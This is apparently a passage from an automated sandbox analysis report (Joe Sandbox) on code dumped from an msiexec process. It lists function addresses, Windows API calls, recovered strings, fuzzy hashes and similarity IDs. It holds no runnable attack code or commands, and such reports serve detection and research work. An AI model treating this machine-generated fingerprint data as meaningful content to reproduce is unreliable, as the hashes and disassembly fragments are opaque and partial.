                                                                    • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                    • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                    • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                    Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                    • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                    • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                    • GetTickCount.KERNEL32 ref: 0040610B
                                                                    • GetParent.USER32(?), ref: 00406136
                                                                    • SendMessageW.USER32(00000000), ref: 0040613D
                                                                    • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                    • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                    • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                    • String ID: A
                                                                    • API String ID: 2892645895-3554254475
                                                                    • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                    • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                    • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                    • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                    Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                      • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                      • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                      • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                      • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                    • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                    • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                    • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                    • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                    • memset.MSVCRT ref: 0040DA23
                                                                    • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                    • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                    • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                      • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                    • String ID: caption
                                                                    • API String ID: 973020956-4135340389
                                                                    • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                    • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                    • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                    • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                    Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                    • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                    • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                    • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$_snwprintf$wcscpy
                                                                    • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                    • API String ID: 1283228442-2366825230
                                                                    • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                    • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                    • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                    • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                    Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • wcschr.MSVCRT ref: 00413972
                                                                    • wcscpy.MSVCRT ref: 00413982
                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                      • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                    • wcscpy.MSVCRT ref: 004139D1
                                                                    • wcscat.MSVCRT ref: 004139DC
                                                                    • memset.MSVCRT ref: 004139B8
                                                                      • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                      • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                    • memset.MSVCRT ref: 00413A00
                                                                    • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                    • wcscat.MSVCRT ref: 00413A27
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                    • String ID: \systemroot
                                                                    • API String ID: 4173585201-1821301763
                                                                    • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                    • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                    • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                    • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                    Function 00414BB0 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: wcscpy
                                                                    • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                    • API String ID: 1284135714-318151290
                                                                    • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                    • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                    • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                    • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                    Function 0040C084 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 110stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                      • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                      • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                    • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                    • strchr.MSVCRT ref: 0040C140
                                                                    • strchr.MSVCRT ref: 0040C151
                                                                    • _strlwr.MSVCRT ref: 0040C15F
                                                                    • memset.MSVCRT ref: 0040C17A
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                                    • String ID: 4$h
                                                                    • API String ID: 4019544885-1856150674
                                                                    • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                    • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                    • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                    • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                    Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                    • String ID: 0$6
                                                                    • API String ID: 4066108131-3849865405
                                                                    • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                    • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                    • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                    • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                    Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004082EF
                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                    • memset.MSVCRT ref: 00408362
                                                                    • memset.MSVCRT ref: 00408377
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$ByteCharMultiWide
                                                                    • String ID:
                                                                    • API String ID: 290601579-0
                                                                    • Opcode ID: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                                    • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                    • Opcode Fuzzy Hash: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                                    • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                    Function 00444E84 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memchr.MSVCRT ref: 00444EBF
                                                                    • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                    • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                    • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                    • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                    • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                    • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                    • memset.MSVCRT ref: 0044505E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$memchrmemset
                                                                    • String ID: PD$PD
                                                                    • API String ID: 1581201632-2312785699
                                                                    • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                    • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                    • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                    • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                    Function 00409F42 Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                    • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                    • GetDC.USER32(00000000), ref: 00409F6E
                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                    • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                    • GetParent.USER32(?), ref: 00409FA5
                                                                    • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                    • String ID:
                                                                    • API String ID: 2163313125-0
                                                                    • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                    • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                    • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                    • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                    Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: free$wcslen
                                                                    • String ID:
                                                                    • API String ID: 3592753638-3916222277
                                                                    • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                    • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                    • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                    • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                    Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040A47B
                                                                    • _snwprintf.MSVCRT ref: 0040A4AE
                                                                    • wcslen.MSVCRT ref: 0040A4BA
                                                                    • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                    • wcslen.MSVCRT ref: 0040A4E0
                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpywcslen$_snwprintfmemset
                                                                    • String ID: %s (%s)$YV@
                                                                    • API String ID: 3979103747-598926743
                                                                    • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                    • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                    • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                    • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                    Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                    • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                    • wcslen.MSVCRT ref: 0040A6B1
                                                                    • wcscpy.MSVCRT ref: 0040A6C1
                                                                    • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                    • wcscpy.MSVCRT ref: 0040A6DB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                    • String ID: Unknown Error$netmsg.dll
                                                                    • API String ID: 2767993716-572158859
                                                                    • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                    • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                    • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                    • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                    Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                    • wcscpy.MSVCRT ref: 0040DAFB
                                                                    • wcscpy.MSVCRT ref: 0040DB0B
                                                                    • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                      • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                    • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                    • API String ID: 3176057301-2039793938
                                                                    • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                    • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                    • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                    • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                    Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • database %s is already in use, xrefs: 0042F6C5
                                                                    • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                    • database is already attached, xrefs: 0042F721
                                                                    • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                    • unable to open database: %s, xrefs: 0042F84E
                                                                    • too many attached databases - max %d, xrefs: 0042F64D
                                                                    • out of memory, xrefs: 0042F865
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpymemset
                                                                    • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                    • API String ID: 1297977491-2001300268
                                                                    • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                    • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                    • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                    • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                    Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EB3F
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 0040EB5B
                                                                    • memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
                                                                    • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC17
                                                                    • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 0040EC21
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC59
                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                    • String ID: ($d
                                                                    • API String ID: 1140211610-1915259565
                                                                    • Opcode ID: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                                    • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                    • Opcode Fuzzy Hash: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                                    • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                    Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                    • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                    • GetLastError.KERNEL32 ref: 004178FB
                                                                    • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: File$ErrorLastLockSleepUnlock
                                                                    • String ID:
                                                                    • API String ID: 3015003838-0
                                                                    • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                    • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                    • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                    • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                    Function 00407E1E Relevance: 13.6, APIs: 9, Instructions: 115COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00407E44
                                                                    • memset.MSVCRT ref: 00407E5B
                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                    • wcscpy.MSVCRT ref: 00407F10
